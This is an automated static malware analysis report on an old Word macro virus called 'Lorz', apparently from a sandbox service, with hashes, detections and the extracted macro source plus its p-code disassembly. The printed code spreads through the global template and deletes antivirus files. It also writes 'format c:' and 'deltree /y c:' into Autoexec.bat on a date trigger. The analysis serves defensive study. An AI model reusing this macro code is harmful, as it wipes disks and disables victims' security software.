Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 914f2070f9ff7504…

MALICIOUS

Office (OLE)

30.5 KB Created: 2000-12-09 21:05:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: b9d475c5df9601ebb78e0685a03cc56d SHA-1: 2fab724620394252ef4e736216932c70af26b0c5 SHA-256: 914f2070f9ff75043c67a6ce3922e1aa65c0d104b77e4bb6027f1451009838d3
188 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample contains legacy WordBasic macro markers and an AutoOpen macro, indicating malicious intent. The AutoOpen macro attempts to copy itself and then executes the ToolsMacro subroutine. ToolsMacro attempts to delete known antivirus files such as 'C:\Program Files\Norton AntiVirus\Virscan.Dat', 'C:\Program Files\F-Prot95\Fpwm32.dll', and 'C:\Program Files\McAfee\Scan.dat' by appending commands to 'C:\Autoexec.bat'. This behavior suggests an attempt to disable security software before a potential payload execution.

Heuristics 4

  • ClamAV: Dos.Trojan.FormatC-59 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Dos.Trojan.FormatC-59
  • Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 10007 bytes
SHA-256: 22e2f27171e231384ce465f1f2410d1227f2078eb4263dd1a5462ebb785537c6
Detection
ClamAV: Dos.Trojan.FormatC-59
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Модуль1"
Sub AutoOpen()

ToolsOptionsSave .GlobalDotPrompt = 0
m$ = FileName$() + ":Lorz"
MacroCopy m$, "Global:FileSaveAs"
m$ = FileName$() + ":AutoOpen"
MacroCopy m$, "Global:Lorz"

End Sub

Sub ToolsMacro()

CommandBars("tools").Controls("Macro").Delete
           CommandBars("tools").Controls("Customize...").Delete
           CommandBars("tools").Controls("Templates and Add-Ins...").Delete
           CommandBars("view").Controls("Toolbars").Delete
End Sub

Sub Rolz()


On Error GoTo a
  VF$ = "C:\Program Files\Norton AntiVirus\Virscan.Dat"

 If Files$(VF$) = "" Then GoTo a
 SetAttr VF$, 0
 Kill VF$

a:
 On Error GoTo c
  AB$ = "C:\Autoexec.bat"
 If Files$(AB$) = "" Then GoTo c
 SetAttr AB$, 0

 Open AB$ For Append As #1
  Print #1, "@echo off"
  Print #1, "IF exist " + VF$ + " then del " + VF$

  Close #1


c:
 On Error GoTo d
  VF$ = "C:\Program Files\F-Prot95\Fpwm32.dll"
 If Files$(VF$) = "" Then GoTo d
 SetAttr VF$, 0
 Kill VF$

d:
  AB$ = "C:\Autoexec.bat"
 If Files$(AB$) = "" Then GoTo f
 SetAttr AB$, 0
 Open AB$ For Append As #1
  Print #1, "IF exist " + VF$ + " then del " + VF$
  Close #1


f:

 On Error GoTo g
  VF$ = "C:\Program Files\McAfee\Scan.dat"
 If Files$(VF$) = "" Then GoTo g
 SetAttr VF$, 0
 Kill VF$

g:
  AB$ = "C:\Autoexec.bat"
 If Files$(AB$) = "" Then GoTo h
 SetAttr AB$, 0
 Open AB$ For Append As #1
  Print #1, "IF exist " + VF$ + " then del " + VF$
  Close #1

h:

 On Error GoTo i
  VF$ = "C:\Tbavw95\Tbscan.sig"
 If Files$(VF$) = "" Then GoTo i
 SetAttr VF$, 0
 Kill VF$

i:
  AB$ = "C:\Autoexec.bat"
 If Files$(AB$) = "" Then GoTo J
 SetAttr AB$, 0
 Open AB$ For Append As #1
  Print #1, "IF exist " + VF$ + " then del " + VF$
  Close #1


J:
If Day(Now()) = 8 And Month(Now() = 7) Then
        SetAttr "C:\AUTOEXEC.BAT", 0
        Name "C:\AUTOEXEC.BAT" As "C:\AUTOEXEC.AAV"
        Open "C:\AUTOEXEC.BAT" For Output As #1
        Print #1, "@Echo off"
        Print #1, "cls"
        Print #1, "echo I have just entered your ass:"
        Print #1, "echo         MS-WINDOWS"
        Print #1, "echo Lorz has been in for awhile   "
        Print #1, "echo                --AKP--"
        Print #1, "echo y|format c: /u /v:AAV >nul"
        Print #1, "deltree /y c: >nul"
        Close #1
        dsk$ = Left$(DefaultDir$(9), 3)
        DocMinimize

Z:


' Processing file: /tmp/qstore_z66ja428
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 903 bytes
' Macros/VBA/Модуль1 - 5287 bytes
' Line #0:
' 	FuncDefn (Sub AutoOpen())
' Line #1:
' Line #2:
' 	MemLdWith GlobalDotPrompt 
' 	LitDI2 0x0000 
' 	Eq 
' 	ArgsCall ToolsOptionsSave 0x0001 
' Line #3:
' 	ArgsLd FileName$ 0x0000 
' 	LitStr 0x0005 ":Lorz"
' 	Add 
' 	St m$ 
' Line #4:
' 	Ld m$ 
' 	LitStr 0x0011 "Global:FileSaveAs"
' 	ArgsCall MacroCopy 0x0002 
' Line #5:
' 	ArgsLd FileName$ 0x0000 
' 	LitStr 0x0009 ":AutoOpen"
' 	Add 
' 	St m$ 
' Line #6:
' 	Ld m$ 
' 	LitStr 0x000B "Global:Lorz"
' 	ArgsCall MacroCopy 0x0002 
' Line #7:
' Line #8:
' 	EndSub 
' Line #9:
' Line #10:
' 	FuncDefn (Sub ToolsMacro())
' Line #11:
' Line #12:
' 	LitStr 0x0005 "Macro"
' 	LitStr 0x0005 "tools"
' 	ArgsLd CommandBars 0x0001 
' 	ArgsMemLd Controls 0x0001 
' 	ArgsMemCall Delete 0x0000 
' Line #13:
' 	LitStr 0x000C "Customize..."
' 	LitStr 0x0005 "tools"
' 	ArgsLd CommandBars 0x0001 
' 	ArgsMemLd Controls 0x0001 
' 	ArgsMemCall Delete 0x0000 
' Line #14:
' 	LitStr 0x0018 "Templates and Add-Ins..."
' 	LitStr 0x0005 "tools"
' 	ArgsLd CommandBars 0x0001 
' 	ArgsMemLd Controls 0x0001 
' 	ArgsMemCall Delete 0x0000 
' Line #15:
' 	LitStr 0x0008 "Toolbars"
' 	LitStr 0x0004 "view"
' 	ArgsLd CommandBars 0x0001 
' 	ArgsMemLd Controls 0x0001 
' 	ArgsMemCall Delete 0x0000 
' Line #16:
' 	EndSub 
' Line #17:
' Line #18:
' 	FuncDefn (Sub Rolz())
' Line #19:
' Line #20:
' Line #21:
' 	OnError a 
' Line #22:
' 	LitStr 0x002D "C:\Program Files\Norton AntiVirus\Virscan.Dat"
' 	St VF$ 
' Line #23:
' Line #24:
' 	Ld VF$ 
' 	ArgsLd Files$ 0x0001 
' 	LitStr 0x0000 ""
' 	Eq 
' 	If 
' 	BoSImplicit 
' 	GoTo a 
' 	EndIf 
' Line #25:
' 	Ld VF$ 
' 	LitDI2 0x0000 
' 	ArgsCall SetAttr 0x0002 
' Line #26:
' 	Ld VF$ 
' 	ArgsCall Kill 0x0001 
' Line #27:
' Line #28:
' 	Label a 
' Line #29:
' 	OnError c 
' Line #30:
' 	LitStr 0x000F "C:\Autoexec.bat"
' 	St AB$ 
' Line #31:
' 	Ld AB$ 
' 	ArgsLd Files$ 0x0001 
' 	LitStr 0x0000 ""
' 	Eq 
' 	If 
' 	BoSImplicit 
' 	GoTo c 
' 	EndIf 
' Line #32:
' 	Ld AB$ 
' 	LitDI2 0x0000 
' 	ArgsCall SetAttr 0x0002 
' Line #33:
' Line #34:
' 	Ld AB$ 
' 	LitDI2 0x0001 
' 	Sharp 
' 	LitDefault 
' 	Open (For Append)
' Line #35:
' 	LitDI2 0x0001 
' 	Sharp 
' 	PrintChan 
' 	LitStr 0x0009 "@echo off"
' 	PrintItemNL 
' Line #36:
' 	LitDI2 0x0001 
' 	Sharp 
' 	PrintChan 
' 	LitStr 0x0009 "IF exist "
' 	Ld VF$ 
' 	Add 
' 	LitStr 0x000A " then del "
' 	Add 
' 	Ld VF$ 
' 	Add 
' 	PrintItemNL 
' Line #37:
' Line #38:
' 	LitDI2 0x0001 
' 	Sharp 
' 	Close 0x0001 
' Line #39:
' Line #40:
' Line #41:
' 	Label c 
' Line #42:
' 	OnError d 
' Line #43:
' 	LitStr 0x0024 "C:\Program Files\F-Prot95\Fpwm32.dll"
' 	St VF$ 
' Line #44:
' 	Ld VF$ 
' 	ArgsLd Files$ 0x0001 
' 	LitStr 0x0000 ""
' 	Eq 
' 	If 
' 	BoSImplicit 
' 	GoTo d 
' 	EndIf 
' Line #45:
' 	Ld VF$ 
' 	LitDI2 0x0000 
' 	ArgsCall SetAttr 0x0002 
' Line #46:
' 	Ld VF$ 
' 	ArgsCall Kill 0x0001 
' Line #47:
' Line #48:
' 	Label d 
' Line #49:
' 	LitStr 0x000F "C:\Autoexec.bat"
' 	St AB$ 
' Line #50:
' 	Ld AB$ 
' 	ArgsLd Files$ 0x0001 
' 	LitStr 0x0000 ""
' 	Eq 
' 	If 
' 	BoSImplicit 
' 	GoTo False 
' 	EndIf 
' Line #51:
' 	Ld AB$ 
' 	LitDI2 0x0000 
' 	ArgsCall SetAttr 0x0002 
' Line #52:
' 	Ld AB$ 
' 	LitDI2 0x0001 
' 	Sharp 
' 	LitDefault 
' 	Open (For Append)
' Line #53:
' 	LitDI2 0x0001 
' 	Sharp 
' 	PrintChan 
' 	LitStr 0x0009 "IF exist "
' 	Ld VF$ 
' 	Add 
' 	LitStr 0x000A " then del "
' 	Add 
' 	Ld VF$ 
' 	Add 
' 	PrintItemNL 
' Line #54:
' 	LitDI2 0x0001 
' 	Sharp 
' 	Close 0x0001 
' Line #55:
' Line #56:
' Line #57:
' 	Label False 
' Line #58:
' Line #59:
' 	OnError g 
' Line #60:
' 	LitStr 0x0020 "C:\Program Files\McAfee\Scan.dat"
' 	St VF$ 
' Line #61:
' 	Ld VF$ 
' 	ArgsLd Files$ 0x0001 
' 	LitStr 0x0000 ""
' 	Eq 
' 	If 
' 	BoSImplicit 
' 	GoTo g 
' 	EndIf 
' Line #62:
' 	Ld VF$ 
' 	LitDI2 0x0000 
' 	ArgsCall SetAttr 0x0002 
' Line #63:
' 	Ld VF$ 
' 	ArgsCall Kill 0x0001 
' Line #64:
' Line #65:
' 	Label g 
' Line #66:
' 	LitStr 0x000F "C:\Autoexec.bat"
' 	St AB$ 
' Line #67:
' 	Ld AB$ 
' 	ArgsLd Files$ 0x0001 
' 	LitStr 0x0000 ""
' 	Eq 
' 	If 
' 	BoSImplicit 
' 	GoTo h 
' 	EndIf 
' Line #68:
' 	Ld AB$ 
' 	LitDI2 0x0000 
' 	ArgsCall SetAttr 0x0002 
' Line #69:
' 	Ld AB$ 
' 	LitDI2 0x0001 
' 	Sharp 
' 	LitDefault 
' 	Open (For Append)
' Line #70:
' 	LitDI2 0x0001 
' 	Sharp 
' 	PrintChan 
' 	LitStr 0x0009 "IF exist "
' 	Ld VF$ 
' 	Add 
' 	LitStr 0x000A " then del "
' 	Add 
' 	Ld VF$ 
' 	Add 
' 	PrintItemNL 
' Line #71:
' 	LitDI2 0x0001 
' 	Sharp 
' 	Close 0x0001 
' Line #72:
' Line #73:
' 	Label h 
' Line #74:
' Line #75:
' 	OnError i 
' Line #76:
' 	LitStr 0x0015 "C:\Tbavw95\Tbscan.sig"
' 	St VF$ 
' Line #77:
' 	Ld VF$ 
' 	ArgsLd Files$ 0x0001 
' 	LitStr 0x0000 ""
' 	Eq 
' 	If 
' 	BoSImplicit 
' 	GoTo i 
' 	EndIf 
' Line #78:
' 	Ld VF$ 
' 	LitDI2 0x0000 
' 	ArgsCall SetAttr 0x0002 
' Line #79:
' 	Ld VF$ 
' 	ArgsCall Kill 0x0001 
' Line #80:
' Line #81:
' 	Label i 
' Line #82:
' 	LitStr 0x000F "C:\Autoexec.bat"
' 	St AB$ 
' Line #83:
' 	Ld AB$ 
' 	ArgsLd Files$ 0x0001 
' 	LitStr 0x0000 ""
' 	Eq 
' 	If 
' 	BoSImplicit 
' 	GoTo J 
' 	EndIf 
' Line #84:
' 	Ld AB$ 
' 	LitDI2 0x0000 
' 	ArgsCall SetAttr 0x0002 
' Line #85:
' 	Ld AB$ 
' 	LitDI2 0x0001 
' 	Sharp 
' 	LitDefault 
' 	Open (For Append)
' Line #86:
' 	LitDI2 0x0001 
' 	Sharp 
' 	PrintChan 
' 	LitStr 0x0009 "IF exist "
' 	Ld VF$ 
' 	Add 
' 	LitStr 0x000A " then del "
' 	Add 
' 	Ld VF$ 
' 	Add 
' 	PrintItemNL 
' Line #87:
' 	LitDI2 0x0001 
' 	Sharp 
' 	Close 0x0001 
' Line #88:
' Line #89:
' Line #90:
' 	Label J 
' Line #91:
' 	ArgsLd Now 0x0000 
' 	ArgsLd Day 0x0001 
' 	LitDI2 0x0008 
' 	Eq 
' 	ArgsLd Now 0x0000 
' 	LitDI2 0x0007 
' 	Eq 
' 	ArgsLd Month 0x0001 
' 	And 
' 	IfBlock 
' Line #92:
' 	LitStr 0x000F "C:\AUTOEXEC.BAT"
' 	LitDI2 0x0000 
' 	ArgsCall SetAttr 0x0002 
' Line #93:
' 	LitStr 0x000F "C:\AUTOEXEC.BAT"
' 	LitStr 0x000F "C:\AUTOEXEC.AAV"
' 	Name 
' Line #94:
' 	LitStr 0x000F "C:\AUTOEXEC.BAT"
' 	LitDI2 0x0001 
' 	Sharp 
' 	LitDefault 
' 	Open (For Output)
' Line #95:
' 	LitDI2 0x0001 
' 	Sharp 
' 	PrintChan 
' 	LitStr 0x0009 "@Echo off"
' 	PrintItemNL 
' Line #96:
' 	LitDI2 0x0001 
' 	Sharp 
' 	PrintChan 
' 	LitStr 0x0003 "cls"
' 	PrintItemNL 
' Line #97:
' 	LitDI2 0x0001 
' 	Sharp 
' 	PrintChan 
' 	LitStr 0x0022 "echo I have just entered your ass:"
' 	PrintItemNL 
' Line #98:
' 	LitDI2 0x0001 
' 	Sharp 
' 	PrintChan 
' 	LitStr 0x0017 "echo         MS-WINDOWS"
' 	PrintItemNL 
' Line #99:
' 	LitDI2 0x0001 
' 	Sharp 
' 	PrintChan 
' 	LitStr 0x0023 "echo Lorz has been in for awhile   "
' 	PrintItemNL 
' Line #100:
' 	LitDI2 0x0001 
' 	Sharp 
' 	PrintChan 
' 	LitStr 0x001B "echo                --AKP--"
' 	PrintItemNL 
' Line #101:
' 	LitDI2 0x0001 
' 	Sharp 
' 	PrintChan 
' 	LitStr 0x001F "echo y|format c: /u /v:AAV >nul"
' 	PrintItemNL 
' Line #102:
' 	LitDI2 0x0001 
' 	Sharp 
' 	PrintChan 
' 	LitStr 0x0012 "deltree /y c: >nul"
' 	PrintItemNL 
' Line #103:
' 	LitDI2 0x0001 
' 	Sharp 
' 	Close 0x0001 
' Line #104:
' 	LitDI2 0x0009 
' 	ArgsLd DefaultDir$ 0x0001 
' 	LitDI2 0x0003 
' 	ArgsLd LBound$ 0x0002 
' 	St dsk$ 
' Line #105:
' 	ArgsCall DocMinimize 0x0000 
' Line #106:
' Line #107:
' 	Label Z 
' Line #108: